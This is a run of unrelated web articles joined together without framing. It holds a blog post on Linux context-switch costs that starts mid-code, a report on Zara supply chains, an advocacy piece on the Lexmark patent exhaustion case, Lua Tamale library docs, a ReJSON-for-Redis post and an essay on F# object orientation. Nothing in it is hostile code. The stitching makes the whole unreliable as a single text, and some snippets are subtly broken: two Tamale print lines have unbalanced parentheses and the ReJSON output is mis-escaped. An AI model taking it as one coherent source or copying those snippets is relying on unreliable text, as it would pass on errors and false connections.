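                MAP_SHARED | MAP_ANONYMOUS, -1, 0);
}

/* Write every page of the working set; called once per ping-pong turn. */
static void touch_working_set(char *ws, size_t npages) {
    memset(ws, 0xAB, npages * PAGE_SIZE);
}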

Here are the results for the 5150:

As we can see, the time needed to write a 4K page more than doubles once our working set is bigger than what we can fit in the L1d (32K). The time per context switch keeps going up and up as the working set size increases, but beyond a certain point the benchmark becomes dominated by memory accesses and is no longer actually testing the overhead of a context switch; it's simply testing the performance of the memory subsystem.

Same test, but this time with CPU affinity (both processes pinned on the same core):

Oh wow, watch this! It's an order of magnitude faster when pinning both processes on the same core! Because the working set is shared, the working set fits entirely in the 4M L2 cache and cache lines simply need to be transferred from L2 to L1d, instead of being transferred from core to core (potentially across 2 physical CPUs, which is far more expensive than within the same CPU).

Now the results for the i7 processor:

Note that this time I covered larger working set sizes, hence the log scale on the X axis.

So yes, context switching on i7 is faster, but only for so long. Real applications (especially Java applications) tend to have large working sets so typically pay the highest price when undergoing a context switch. Other observations about the Nehalem architecture used in the i7:

  • Going from L1 to L2 is almost unnoticeable. It takes about 130ns to write a page with a working set that fits in L1d (32K) and only 180ns when it fits in L2 (256K). In this respect, the L2 on Nehalem is more of a "L1.5", since its latency is simply not comparable to that of the L2 of previous CPU generations.
  • As soon as the working set increases beyond 1024K, the time needed to write a page jumps to 750ns. My theory here is that 1024K = 256 pages = half of the TLB of the core, which is shared by the two HyperThreads. Because now both HyperThreads are fighting for TLB entries, the CPU core is constantly doing page table lookups.
Speaking of TLB, the Nehalem has an interesting architecture. Each core has a 64 entry "L1d TLB" (there's no "L1i TLB") and a unified 512 entry "L2TLB". Both are dynamically allocated between both HyperThreads.

Virtualization

I was wondering how much overhead there is when using virtualization. I repeated the benchmarks for the dual E5440, once in a normal Linux install, once while running the same install inside VMware ESX Server. The result is that, on average, it's 2.5x to 3x more expensive to do a context switch when using virtualization. My guess is that this is due to the fact that the guest OS can't update the page table itself, so when it attempts to change it, the hypervisor intervenes, which causes an extra 2 context switches (one to get inside the hypervisor, one to get out, back to the guest OS).

This probably explains why Intel added the EPT (Extended Page Table) on the Nehalem, since it enables the guest OS to modify its own page table without the help of the hypervisor, and the CPU is able to do the end-to-end memory address translation on its own, entirely in hardware (virtual address to "guest-physical" address to physical address).

Parting words

Context switching is expensive. My rule of thumb is that it'll cost you about 30µs of CPU overhead. This seems to be a good worst-case approximation. Applications that create too many threads that are constantly fighting for CPU time (such as Apache's HTTPd or many Java applications) can waste considerable amounts of CPU cycles just to switch back and forth between different threads. I think the sweet spot for optimal CPU use is to have the same number of worker threads as there are hardware threads, and write code in an asynchronous / non-blocking fashion. Asynchronous code tends to be CPU bound, because anything that would block is simply deferred to later, until the blocking operation completes. This means that threads in asynchronous / non-blocking applications are much more likely to use their full time quantum before the kernel scheduler preempts them. And if there's the same number of runnable threads as there are hardware threads, the kernel is very likely to reschedule threads on the same core, which significantly helps performance.

Another hidden cost that severely impacts server-type workloads is that after being switched out, even if your process becomes runnable, it'll have to wait in the kernel's run queue until a CPU core is available for it. Linux kernels are often compiled with HZ=100, which entails that processes are given time slices of 10ms. If your thread has been switched out but becomes runnable almost immediately, and there are 2 other threads before it in the run queue waiting for CPU time, your thread may have to wait up to 20ms in the worst scenario to get CPU time. So depending on the average length of the run queue (which is reflected in load average), and how long your threads typically run before getting switched out again, this can considerably impact performance.

It is illusory to imagine that NPTL or the Nehalem architecture made context switching cheaper in real-world server-type workloads. Default Linux kernels don't do a good job at keeping CPU affinity, even on idle machines. You must explore alternative schedulers or use taskset or cpuset to control affinity yourself. If you're running multiple different CPU-intensive applications on the same server, manually partitioning cores across applications can help you achieve very significant performance gains.


Most items of clothing have complicated international journeys

Image caption: This Zara dress had been to at least five countries before it ended up on a shop hanger.

"Made in Morocco" says the label on the pink Zara shirt dress.

While this may be where the garment was finally sewn together, it has already been to several other countries.

In fact, it's quite possible this piece of clothing is better travelled than you. If it were human, it would certainly have journeyed far enough to have earned itself some decent air miles.

The material used to create it came from lyocell - a sustainable alternative to cotton. The trees used to make this fibre come mainly from Europe, according to Lenzing, the Austrian supplier that Zara-owner Inditex uses.

These fibres were shipped to Egypt, where they were spun into yarn. This yarn was then sent to China where it was woven into a fabric. This fabric was then sent to Spain where it was dyed, in this case pink. The fabric was then shipped to Morocco to be cut into the various parts of the dress and then sewn together.

After this, it was sent back to Spain where it was packaged and then sent to the UK, the US or any one of the 93 countries where Inditex has shops.

From dresses to t-shirts and trousers, most items of clothing sold around the world will have had similarly complicated journeys.

In fact, they're likely to be even more convoluted.

Most Inditex garments are made close to its Spanish headquarters or in nearby countries such as Portugal, Morocco and Turkey.

This is what helps the firm achieve its famously fast reaction times to new trends.

Most of its rivals' supply chains are far less local.

Regardless of where they're based, most factories are not owned by the fashion brands that use them. Instead, they're selected as official suppliers. Often these suppliers subcontract work to other factories for certain tasks, or in order to meet tight deadlines.

Image caption: Your cotton top may well have started out in a field in Texas before criss-crossing the globe.

This system can make tracking the specific origins of a single item difficult. Last week I contacted several big clothing brands, including H&M, Marks and Spencer, Gap and Arcadia Group, and asked each to give me an example of the journey of a t-shirt in their basic range, from seed to finished product.

Only Inditex was able to respond in time to meet the deadline for this article.

"I imagine companies don't want to respond because they have no clue where the materials they buy come from," says Tim Hunt, a researcher at Ethical Consumer, which researches the social, ethical and environmental behaviour of firms.

The difficulties were highlighted devastatingly by the 2013 Rana Plaza disaster where more than 1,100 people were killed and 2,500 injured when the Bangladesh garment factory collapsed.

In some cases, brands weren't even aware their clothes were being produced there.

Image caption: The #whomademyclothes campaign encourages customers to put pressure on fashion firms to be more open about their suppliers.

According to the "Behind the Barcode" report by Christian Aid and development organisation Baptist World Aid Australia, only 16% of the 87 biggest fashion brands publish a full list of the factories where their clothes are sewn, and less than a fifth of brands know where all of their zips, buttons, thread and fabric come from.

Non-profit group Fashion Revolution, formed after the Rana Plaza factory collapse, is leading a campaign to try to force firms to be more transparent about their supply chains.

Every year, around the time of the disaster it runs a #whomademyclothes campaign encouraging customers to push firms on this issue.

Fashion Revolution co-founder and creative director Orsola de Castro says the mass production demands of the fashion industry, and the tight timescales required to get products from the catwalks on to the shelves as quickly as possible, mean the manufacturing processes have become "very, very chaotic".

"The amount of manpower which goes into the production of a t-shirt - even at the sewing level, it goes through so many different hands. On their standard products most brands wouldn't know the journey from seed to store," she says.

While newer and smaller fashion brands are creating products with 100% traceability, she says it's a lot harder for the established giants.

"It's a big and complex issue to turn around and would require a massive shift in attitude."

Image caption: Pietra Rivoli travelled from the US to China and Africa to track the journey of a single $6 t-shirt.

Yet just over a decade ago, Pietra Rivoli had no problems tracking the journey of a single $6 cotton t-shirt she'd picked out of a sale bin in a Walmart in Florida.

Starting with the tag at the back of the t-shirt, she tracked its journey backwards from the US "step by step along the supply chain".

"A shoe leather project," is how Prof Rivoli describes her journey, which resulted in a book, The Travels of a T-Shirt in the Global Economy.

As a teacher of finance and international business at Georgetown University in Washington, Prof Rivoli wanted to investigate her assumption that free trade benefited all countries.

Image caption: Pietra Rivoli says the current backlash against global trade is linked to political interference.

Her travels took her from the cotton-growing region of Lubbock in Texas to China, where the t-shirt was sewn together. Eventually, she ended up in Tanzania on the east coast of Africa, which has a thriving second-hand clothing market.

Her assumption was that the complicated supply chain was driven by cost and market forces.

She concluded that a lot of brands' decisions about where to buy supplies and make their clothing was actually driven by politics. She cites US agricultural subsidies for cotton growers and China's migration policies encouraging workers to move from the countryside as examples.

"Rather than a story of how people were competing - how do I make a faster T-shirt, a better T-shirt, a cheaper T-shirt - what I found is that the story of the T-shirt and why its life turned out the way it did was really about how people were using political power," she says.

The current backlash against global trade is a direct result of this kind of political interference, she believes.

This kind of consumer anger could eventually drive change among fashion firms, she says. Prof Rivoli notes that many firms now list all their direct suppliers and she says there is a move towards developing fewer, longer term supplier relationships.

"There might be a little less hopping around," she laughs.


The US Supreme Court is hearing a case about patent law’s “exhaustion doctrine”

Today, the Supreme Court heard arguments in a case that could allow companies to keep a dead hand of control over their products, even after you buy them. The case, Impression Products v. Lexmark International, is on appeal from the Court of Appeals for the Federal Circuit, which last year affirmed its own precedent allowing patent holders to restrict how consumers can use the products they buy. That decision, and the precedent it relied on, departs from long-established legal rules that safeguard consumers and enable innovation.

When you buy something physical—a toaster, a book, or a printer, for example—you expect to be free to use it as you see fit: to adapt it to suit your needs, fix it when it breaks, re-use it, lend it, sell it, or give it away when you’re done with it. Your freedom to do those things is a necessary aspect of your ownership of those objects. If you can’t do them, because the seller or manufacturer has imposed restrictions or limitations on your use of the product, then you don’t really own them. Traditionally, the law safeguards these freedoms by discouraging sellers from imposing certain conditions or restrictions on the sale of goods and property, and limiting the circumstances in which those restrictions may be imposed by contract.

But some companies are relentless in their quest to circumvent and undermine these protections. They want to control what end users of their products can do with the stuff they ostensibly own, by attaching restrictions and conditions on purchasers, locking down their products, and locking you (along with competitors and researchers) out. If they can do that through patent law, rather than ordinary contract, it would mean they could evade legal limits on contracts, and that anyone using a product in violation of those restrictions (whether a consumer or competitor) could face harsh penalties for patent infringement.

Impression Products v. Lexmark International is Lexmark’s latest attempt to prevent purchasers from reusing and refilling its ink cartridges with cheaper ink. If Lexmark can use patent law to accomplish this, it won’t just affect the person or company that buys the cartridge, but also anyone who later acquires or refills it, even if they never agreed to what Lexmark wanted.

The case will turn on how the Supreme Court applies patent law’s “exhaustion doctrine.” As the Court explained in its unanimous Quanta v. LG Electronics decision, the exhaustion doctrine provides that “the initial authorized sale of a patented item terminates all patent rights.” Meaning, a patent holder can’t use patent rights to control what you can do with the product you’ve purchased, because they no longer have patent rights in that particular object. As we explained in a brief submitted along with Public Knowledge, Mozilla, the AARP, and R Street Institute to the Supreme Court, the doctrine protects both purchasers and downstream users of patented products. Without the exhaustion doctrine, patent holders would be free to impose all kinds of limits on what you can do with their products, and can use patent infringement’s severe penalties as the enforcement mechanism. The doctrine also serves patent law’s constitutional purpose—to promote progress and innovation—by ensuring that future innovators have access to, and can research and build on, existing inventions, without seeking permission from the patent holder.

This isn’t Lexmark’s first bite at the apple. The company first tried to argue that copyright law, and section 1201 of the DMCA (which prohibits circumvention of DRM), gave it the right to prevent re-use of its toner cartridges. In 2004, the Sixth Circuit roundly rejected Lexmark’s copyright claims. The court explained that even if Lexmark could claim copyright in the code at issue, and while it might want to protect its market share in cartridges, “that is not the sort of market value that copyright protects.” The Sixth Circuit also shot down Lexmark’s section 1201 claims, stating

[n]owhere in its deliberations over the DMCA did Congress express an interest in creating liability for the circumvention of technological measures designed to prevent consumers from using consumer goods while leaving copyrightable content of a work unprotected. In fact, Congress added the interoperability provision in part to ensure that the DMCA would not diminish the benefit to consumers of interoperable devices "in the consumer electronics environment."

Having lost on its copyright claims, Lexmark found a warmer welcome at the Federal Circuit, which last year held that so long as the company “restricted” the sale of its product (in this case through a notice placed on the side of the cartridge), Lexmark could get around patent exhaustion and retain the right to control downstream users’ behavior under patent law.

The Federal Circuit’s ruling in Lexmark seriously undermines the exhaustion doctrine, allowing patent holders to control users’ behavior long after the point of purchase merely by including some form of notice of the restriction at the point of sale. As we’ve said before, this is especially troubling because downstream users and purchasers may be entirely unaware of the patent owner’s restrictions.

The Federal Circuit’s ruling is also significantly out of step with how the majority of the law treats these kinds of restrictions. While sellers can use contract law to bind an original purchaser to mutually agreed-upon terms (with some limits), for hundreds of years courts have disfavored sellers’ attempts to use other laws to control goods after a transfer of ownership. Courts and legal scholars have long acknowledged that such restrictions impair the purchasers’ personal autonomy, interfere with efficient use of property, create confusion in markets, and increase information costs. The Federal Circuit’s ruling is even out of step with copyright law, whose exhaustion principle is codified in the first sale doctrine.

We’re hopeful that the Supreme Court will reverse the Federal Circuit and bring patent law’s exhaustion doctrine back in line.


Tamale: An Erlang-Style Pattern-Matching Library for Lua

Overview

Tamale is a Lua library for structural pattern matching - kind of like regular expressions for arbitrary data structures, not just strings. (Or Sinatra for data structures, rather than URLs.)

tamale.matcher reads a rule table and produces a matcher function. The table should list {pattern, result} rules, which are structurally compared in order against the input. The matcher returns the result for the first successful rule, or (nil, "Match failed") if none match.

Basic Usage

require "tamale"
local V = tamale.var
local M = tamale.matcher {
   { {"foo", 1, {} },      "one" },
   { 10,                   function() return "two" end},
   { {"bar", 10, 100},     "three" },
   { {"baz", V"X" },       V"X" },    -- V"X" is a variable
   { {"add", V"X", V"Y"},  function(cs) return cs.X + cs.Y end },
}

print(M({"foo", 1, {}}))   --> "one"
print(M(10))               --> "two"
print(M({"bar", 10, 100})) --> "three"
print(M({"baz", "four"}))  --> "four"
print(M({"add", 2, 3})     --> 5
print(M({"sub", 2, 3})     --> nil, "Match failed"

The result can be either a literal value (number, string, etc.), a variable, a table, or a function. Functions are called with a table containing the original input and captures (if any); its result is returned. Variables in the result (standalone or in tables) are replaced with their captures.

Benefits of Pattern Matching

  • Declarative (AKA "data-driven") programming is easy to locally reason about, maintain, and debug.
  • Structures do not need to be manually unpacked - pattern variables automatically capture the value from their position in the input.
  • "It fits or it doesn't fit" - the contract that code is expected to follow is very clear.
  • Rule tables can be compiled down to search trees, which are potentially more efficient than long, nested if / switch statements. (Tamale currently does not do this, but could in the future without any change to its interface. Also, see Indexing below.)

Imperative code to rebalance red-black trees can get pretty hairy. With pattern matching, the list of transformations is the code.

-- create red & black tags and local pattern variables
local R,B,a,x,b,y,c,z,d = "R", "B", V"a", V"x", V"b", V"y", V"c", V"z", V"d"
local balanced = { R, { B, a, x, b }, y, { B, c, z, d } }
                                                                                                                                 
balance = tamale.matcher {
   { {B, {R, {R, a, x, b}, y, c}, z, d},  balanced },
   { {B, {R, a, x, {R, b, y, c,}}, z, d}, balanced },
   { {B, a, x, {R, {R, b, y, c,}, z, d}}, balanced },
   { {B, a, x, {R, b, y, {R, c, z, d}}},  balanced },
   { V"body", V"body" },      -- default case, keep the same
}

(Adapted from Chris Okasaki's Purely Functional Data Structures.)

The style of pattern matching used in Tamale is closest to Erlang's. Since pattern-matching comes from declarative languages, it may help to study them directly.

Particularly recommended:

  • The Art of Prolog by Leon Sterling & Ehud Shapiro
  • Programming Erlang by Joe Armstrong

Rules

Each rule has the form { *pattern*, *result*, [when=function] }.

The pattern can be a literal value, table, or function. For tables, every field is checked against every field in the input (and those fields may in turn contain literals, variables, tables, or functions).

Functions are called on the input's corresponding field. If the function's first result is non-false, the field is considered a match, and all results are appended to the capture table (see below). If the function returns false or nil, the match fails.
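
For instance, here is a small, hedged sketch of a custom function pattern (not from the original docs; it assumes, per the rule above, that the function's return values land in the numeric slots of the capture table):

-- reuses V = tamale.var from the Basic Usage example above
local function positive_number(v)
   if type(v) == "number" and v > 0 then return v end
end

local level_matcher = tamale.matcher {
   { {"level", positive_number}, function(cs) return "level " .. cs[1] end },
   { V"_",                       "invalid" },   -- default case
}

print(level_matcher({"level", 3}))    --> "level 3"
print(level_matcher({"level", -1}))   --> "invalid"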

tamale.P marks strings as patterns that should be compared with string.match (possibly returning captures), rather than as a string literal. Use it like { P"aaa(.*)bbb", result}.

Its entire implementation is just

function P(str)
    return function(v)
        if type(v) == "string" then return string.match(v, str) end
    end
end

Rules also have two optional keyword arguments:

Extra Restrictions - when=function(captures)

This is used to add further restrictions to a rule, such as a rule that can only take strings which are also valid e-mail addresses. (The function is passed the captures table.)

-- is_valid(cs) checks cs[1] 
{ P"(.*)", register_address, when=is_valid }

Partial patterns - partial=true

This flag allows a table pattern to match a table input value which has more fields than are listed in the pattern.

{ {tag="leaf"}, some_fun, partial=true }

could match against any table that has the value t.tag == "leaf", regardless of any other fields.

Variables and Captures

The patterns specified in Tamale rules can have variables, which capture the contents of that position in the input. To create a Tamale variable, use tamale.var('x') (which can be aliased as V'x', if you're into the whole brevity thing).

Variable names can be any string, though any beginning with _ are ignored during matching (i.e., {V"_", V"_", V"X", V"_" } will capture the third value from any four-value array). Variable names are not required to be uppercase; it's just a convention from Prolog and Erlang.

Also, note that declaring local variables for frequently used Tamale variables can make rule tables cleaner. Compare

local X, Y, Z = V"X", V"Y", V"Z"
M = tamale.matcher {
   { {X, X},    1},   -- capitalization helps to keep
   { {X, Y},    2},   -- the Tamale vars distinct from
   { {X, Y, Z}, 3},   -- the Lua vars
}

with

M = tamale.matcher {
   { {V'X', V'X'},       1},
   { {V'X', V'Y'},       2},
   { {V'X', V'Y', V'Z'}, 3},
}

The _ example above could be reduced to {_, _, X, _}.

Finally, when the same variable appears in multiple fields in a rule pattern, such as { X, Y, X }, each repeated field must structurally match its other occurrences. {X, Y, X} would match {6, 1, 6}, but not {5, 1, 7}.

The Rule Table

The function tamale.matcher takes a rule table and returns a matcher function. The matcher function takes one or more arguments; the first is matched against the rule table, and any further arguments are saved in captures.args.
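
A quick hedged sketch of the extra-argument behavior (it assumes, as the name suggests, that captures.args is an array of the additional arguments, in the order they were passed):

local scale = tamale.matcher {
   { {"scale", V"X"}, function(cs) return cs.X * cs.args[1] end },
}

print(scale({"scale", 7}, 3))   --> 21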

The rule table also takes a couple other options, which are described below.

Identifiers - ids={List, Of, IDs}

Tamale defaults to structural comparison of tables, but sometimes tables are used as identifiers, e.g. SENTINEL = {}. The rule table can have an optional argument of ids={LIST, OF, IDS}, for values that should still be compared by == rather than structure. (Otherwise, all such IDs would match each other, and any empty table.)
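
A minimal sketch of the ids option (not from the original docs; it assumes SENTINEL, once listed in ids, only matches itself by ==, while a plain {} in a pattern still matches structurally):

local SENTINEL = {}

local M = tamale.matcher {
   { {"tag", SENTINEL}, "the sentinel" },
   { {"tag", V"_"},     "something else" },
   ids = { SENTINEL },
}

print(M({"tag", SENTINEL}))   --> "the sentinel"
print(M({"tag", {}}))         --> "something else"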

Indexing - index=field

Indexing in Tamale is like indexing in relational databases: rather than testing every single rule to find a match, only those in the index need to be tested. Often, this singlehandedly eliminates most of the rules. By default, the rules are indexed by the first value.

When the rule table

tamale.matcher {
    { {1, "a"}, 1 },
    { {1, "b"}, 2 },
    { {1, "c"}, 3 },
    { {2, "d"}, 4 },
}

is matched against {2, "d"}, it only needs one test if the rule table is indexed by the first field - the fourth rule is the only one starting with 2. To specify a different index than pattern[1], give the rule table a keyword argument of index=I, where I is either another key (such as 2 or "tag"), or a function. If a function is used, each rule will be indexed by the result of applying the function to it.

For example, with the rule table

tamale.matcher {
   { {"a", "b", 1}, 1 },   -- index "ab"
   { {"a", "c", 1}, 2 },   -- index "ac"
   { {"b", "a", 1}, 3 },   -- index "ba"
   { {"b", "c", 1}, 4 },   -- index "bc"
   index=function(rule) return rule[1] .. rule[2] end
}

each rule will be indexed based on the first two fields concatenated, rather than just the first. An input value of {"a", "c", 1} would only need to check the second row, not the first.

Indexing should never change the results of pattern matching, just make the matcher function do less searching. Note that an indexing function needs to be deterministic - indexing by (say) os.time() will produce weird results. An argument of index=false turns indexing off.

Debugging - debug=true

Tamale has several debugging traces. They can be enabled either by setting tamale.DEBUG to true, or by adding debug=true as a keyword argument to a rule table.

Matching { "a", "c", 1 } against

tamale.matcher {
   { {"a", "b", 1}, 1 },
   { {"a", "c", 1}, 2 },
   { {"b", "a", 1}, 3 },
   { {"b", "c", 1}, 4 },
   index=function(rule) return rule[1] .. rule[2] end,
   debug = true
}

will print

* rule 1: indexing on index(t)=ab
* rule 2: indexing on index(t)=ac
* rule 3: indexing on index(t)=ba
* rule 4: indexing on index(t)=bc
-- Checking rules: 2
-- Trying rule 2...matched
2

This can be used to check whether indexing is effective, if one rule is pre-empting another, etc.

Close this section

Redis as a JSON store

tl;dr a Redis module that provides native JSON capabilities – get it from the GitHub repository or read the docs online.

Both JSON and Redis need no introduction; the former is the standard data interchange format between modern applications, whereas the latter is ubiquitous wherever they need performant data management. That being the case, I was shocked when, a couple of years ago, I learned that the two don’t get along.

Redis isn’t a one-trick pony–it is, in fact, quite the opposite. Unlike general purpose one-size-fits-all databases, Redis (a.k.a the “Swiss Army Knife of Databases”, “Super Glue of Microservices” and “Execution context of Functions-as-a-Service”) provides specialized tools for specific tasks. Developers use these tools, which are exposed as abstract data structures and their accompanying operations, to model optimal solutions for problems. And that is exactly the reason why using Redis for managing JSON data is unnatural.

Fact: despite its multitude of core data structures, Redis has none that fit the requirements of a JSON value. Sure, you can work around that by using other data types: Strings are great for storing raw serialized JSON, and you can represent flat JSON objects with Hashes. But these workaround patterns impose limitations that make them useful only in a handful of use cases, and even then the experience leaves an un-Redis-ish aftertaste. Their awkwardness clashes sharply with the simplicity and elegance of using Redis normally.

But all that changed during the last year, after Salvatore Sanfilippo’s (@antirez) visit to the Tel Aviv office and with Redis modules becoming a reality. Suddenly the sky wasn’t the limit anymore. Now that modules let anyone do anything, it turned out that I could be that particular anyone. Picking up C development after a hiatus of more than two decades proved to be less of a nightmare than I had anticipated, and with Dvir Volk’s (@dvirsky) loving guidance we birthed ReJSON.

While you may not be thrilled about its name (I know that I’m not – suggestions are welcome), ReJSON itself should make any Redis user giddy with JSON joy. The module provides a new data type that is tailored for fast and efficient manipulation of JSON documents. Like any Redis data type, ReJSON’s values are stored in keys that can be accessed with a specialized subset of commands. These commands, or the API that the module exposes, are designed to be intuitive to users coming to Redis from the JSON world and vice versa. Consider this example that shows how to set and get values:

127.0.0.1:6379> JSON.SET scalar . '"Hello JSON!"'
OK
127.0.0.1:6379> JSON.SET object . '{"foo": "bar", "ans": 42}'
OK
127.0.0.1:6379> JSON.GET object
"{\"foo\":\"bar",\"ans\":42}"
127.0.0.1:6379> JSON.GET object .ans
"42"
127.0.0.1:6379> ^C
~$ 


Like any well-behaved module, ReJSON’s commands come prefixed. Both JSON.SET and JSON.GET expect the key’s name as their first argument. In the first line we set the root (denoted by a period character: “.”) of the key named scalar to a string value. Next, a different key named object is set with a JSON object (which is first read whole) and then a single sub-element by path.

What happens under the hood is that whenever you call JSON.SET, the module takes the value through a streaming lexer that parses the input JSON and builds a tree data structure from it.

ReJSON stores the data in binary format in the tree’s nodes, and supports a subset of JSONPath for easy referencing of subelements. It boasts an arsenal of atomic commands that are tailored for every JSON value type, including: JSON.STRAPPEND for appending strings; JSON.NUMMULTBY for multiplying numbers; and JSON.ARRTRIM for trimming arrays… and making pirates happy.

Because ReJSON is implemented as a Redis module, you can use it with any Redis client that: a) supports modules (ATM none) or b) allows sending raw commands (ATM most). For example, you can use a ReJSON-enabled Redis server from your Python code with redis-py like so:

import redis
import json

data = {
    'foo': 'bar',
    'ans': 42
}

r = redis.StrictRedis()
r.execute_command('JSON.SET', 'object', '.', json.dumps(data))
reply = json.loads(r.execute_command('JSON.GET', 'object'))
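
The type-specific commands mentioned earlier can be driven the same way. The following is a hedged continuation of that sketch; the (key, path, value/range) argument order is my reading of the module docs, so double-check it before relying on it:

import json
import redis

r = redis.StrictRedis()
r.execute_command('JSON.SET', 'object', '.',
                  json.dumps({'foo': 'bar', 'ans': 21, 'tags': ['a', 'b', 'c', 'd']}))

# Atomic, type-specific updates (argument order assumed from the docs):
r.execute_command('JSON.NUMMULTBY', 'object', '.ans', 2)        # .ans becomes 42
r.execute_command('JSON.STRAPPEND', 'object', '.foo', '"baz"')  # .foo becomes "barbaz"
r.execute_command('JSON.ARRTRIM', 'object', '.tags', 0, 1)      # .tags becomes ['a', 'b']

print(json.loads(r.execute_command('JSON.GET', 'object')))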


But that’s just half of it. ReJSON isn’t only a pretty API – it is also a powerhouse in terms of performance. Initial performance benchmarks already demonstrate that. For example:

The above graphs compare the rate (operations/sec) and average latency of read and write operations performed on a 3.4KB JSON payload that has three nested levels. ReJSON is pitted against two variants that store the data in Strings. Both variants are implemented as Redis server-side Lua scripts with the json.lua variant storing the raw serialized JSON, and msgpack.lua using MessagePack encoding.

If you have 21 minutes to spare, here’s the ReJSON presentation from Redis Day TLV:

You can start playing with ReJSON today! Get it from the GitHub repository or read the docs online. There are still many features that we want to add to it, but it’s pretty neat as it is. If you have feature requests or have spotted an issue, feel free to use the repo’s issue tracker. You can always email or tweet at me – I’m highly-available 🙂

Close this section

Why OO Matters in F#

F# is a functional-first programming language that comes with a substantial object-oriented feature set. It is so feature-complete in fact, that almost any C# class can be ported over to F# code with little substantial alteration.

However significant, this subset of the language is seeing limited appreciation from the community, which I suspect is partly fuelled by the known criticisms of OOP and partly by a desire to be different than C#. After all, this is a functional-first language so we can just replace all our classes with functions. There is also the opinion that OOP in F# merely serves as a compatibility layer for .NET, so it’s really only there to cover those unfortunate scenarios of having to use a library that accepts interfaces.

Enabling Abstraction

One of the most important aspects of maintaining a nontrivial codebase is controlling complexity. Complexity can be contained by partitioning code into logically standalone components whose implementation details are hidden behind appropriately designed abstractions. In his excellent Solid and Functional article, Vesa Karvonen argues that selecting the correct abstraction is a hard problem, and that functional programming is no silver bullet in dealing with that. This resonates a lot with me, and I strongly encourage everyone to read the full article.

That said, Vesa is framing the article in Standard ML which supports a full-blown module system. Modules can be abstracted using signatures or they can be parameterized by other modules using functors. Modules are the predominant means of abstraction in the ML ecosystem. In Haskell, it is type classes and higher-kinded types. In F#, modules are intentionally stripped of any complicated features, effectively functioning as a mere namespacing construct.

My claim is that there are inherent limits to what can be expressed using just F# modules and functions, in terms of enabling good abstraction. Luckily, we can always make use of the next best thing, which is F# OO. The thesis of this article is that strategically admitting elements of OO in an F# codebase significantly improves quality and maintainability. While I cannot conclusively prove this within the confines of a single blog post, I will try to provide hints as to why this is.

Classes as Value Parametric Modules

It is often the case that an API exposed through a module must be context aware. Typically F# developers address this by adding extra parameters in every function:

module MyApi =
    let function1 dep1 dep2 dep3 arg1 = doStuffWith dep1 dep2 dep3 arg1
    let function2 dep1 dep2 dep3 arg2 = doStuffWith' dep1 dep2 dep3 arg2

While this does work well in simple cases, it does not scale nicely as dependencies increase. It would typically prompt the developer to group arguments in context records:

type MyApiContext = { Dep1 : Dep1 ; Dep2 : Dep2 ; Dep3 : Dep3 }

module MyApi =
    let function1 (ctx : MyApiContext) arg1 = doStuffWith ctx.Dep1 ctx.Dep2 ctx.Dep3 arg1
    let function2 (ctx : MyApiContext) arg2 = doStuffWith' ctx.Dep1 ctx.Dep2 ctx.Dep3 arg2

This complicates the implementation even more both in the definition site and in the consumption site. In practice, you either end up with one context type per component or one God context for the entire application. Even more importantly, this approach often violates encapsulation concerns, pushing the burden of gathering dependencies to the consumers of the API, every single time they do consume the API. Partial application also does little to address any of these concerns in nontrivial contexts.

Less experienced developers might be prompted to do something even worse: lift dependencies to module values.

module MyApi =
    let dep1 = File.ReadAllText "/Users/eirik/connectionstring.txt"
    let dep2 = Environment.GetEnvironmentVariable "DEP_2"
    let dep3 = Random().Next()

    let function1 arg = doStuffWith dep1 dep2 dep3 arg
    let function2 arg = doStuffWith' dep1 dep2 dep3 arg

This is bad for many reasons: it makes the API reliant on global state, introduces unneeded side-effects, and pushes app configuration concerns deep inside the guts of our codebase. What’s more, module value initialization compiles to a static constructor for the entire compilation unit so the exact moment of execution is largely unpredictable. Initialization errors manifest as TypeInitializationExceptions which are difficult to debug.

Contrast the situation above with the elegance afforded by a plain old class:

type MyParametricApi(dep1, dep2, dep3) =
    member __.Function1 arg1 = doStuffWith dep1 dep2 dep3 arg1
    member __.Function2 arg2 = doStuffWith' dep1 dep2 dep3 arg2

An API object could be created once at application initialization, or as many times as required depending on context. It’s also more amenable to testing. I should add that this approach is essentially just as “functional” as the approaches above, since it’s merely composing dependencies to expose a context-sensitive API. Importantly, it achieves this in a much simpler way both at the definition site and the consumption site, which pays great dividends if realized in big codebases.

Expressive APIs

An important attribute of method-based APIs is that they allow for greater expressive power, in two important ways:

  1. Named/Optional parameters: unlike OCaml, whose functions support out-of-order named argument passing and omitted optional arguments, F# functions support neither. Luckily, we can do this using F# methods. I find this to be an immensely powerful tool when exposing non-trivially parameterizable functionality. A function that explicitly accepts 10 optional parameters is not acceptable; a method that accepts 10 optional arguments works like a charm (see the sketch after this list).
  2. Method overloading: because function names like connect' and bind2 are simply not good enough when exposed in a public API.
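
To illustrate the first point, here is a minimal sketch using a hypothetical HttpFetcher type; nothing about it is tied to any real library:

type HttpFetcher() =
    // Optional parameters are declared with '?'; callers can pass them by name.
    member __.Fetch (url : string, ?timeout : int, ?retries : int) =
        let timeout = defaultArg timeout 30
        let retries = defaultArg retries 0
        sprintf "GET %s (timeout=%ds, retries=%d)" url timeout retries

let fetcher = HttpFetcher()
// Omit what you don't need and name the rest, in any order.
fetcher.Fetch ("http://example.org", retries = 3) |> printfn "%s"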

More Powerful Types

The type system afforded by .NET is strictly more powerful than what can be expressed using modules and functions. For example, the interface

type Scheduler =
    abstract Run<'T> : Async<'T> -> 'T

encodes a kind of function that cannot be expressed in terms of proper F# lambdas. When combined with subtyping, it is possible to effectively encode existential types and Rank-N polymorphism. Even GADTs are possible, with minimal augmentations of the type system.

In practice, it is possible to leverage that additional power very effectively. In fact, F# makes it easy to define generic function literals using object expressions. This is also how the TypeShape library has been made possible.
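
As a small, hedged illustration, an object expression can implement the Scheduler interface above inline; the synchronous implementation here is just the simplest possible example:

// A generic "function literal": one anonymous object, no named class required.
let syncScheduler =
    { new Scheduler with
        member __.Run workflow = Async.RunSynchronously workflow }

let two = syncScheduler.Run (async { return 1 + 1 })   // two = 2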

Abstracting Modules

Functions are the unit of abstraction in F#, but that unit is often insufficient when abstracting APIs. This prompts developers to adopt an approach where abstract APIs are surfaced as either records or tuples of functions:

type Serializer =
    {
        Serialize : bool -> obj -> string
        Deserialize : bool -> string -> obj
    }

The F# design guidelines discourage the use of records for building APIs and recommend using regular interfaces instead.

I strongly agree with this recommendation for a multitude of reasons: interfaces are more powerful since they support generic methods, named arguments and optional arguments. An interface is less likely to be defined in terms of closures, making it easier to reason about when viewed from a debugger.

So the example above could be rendered as an interface like so:

type Serializer =
    abstract Serialize<'T> : preserveRefEq:bool -> value:'T -> string
    abstract Deserialize<'T> : preserveRefEq:bool -> pickle:string -> 'T

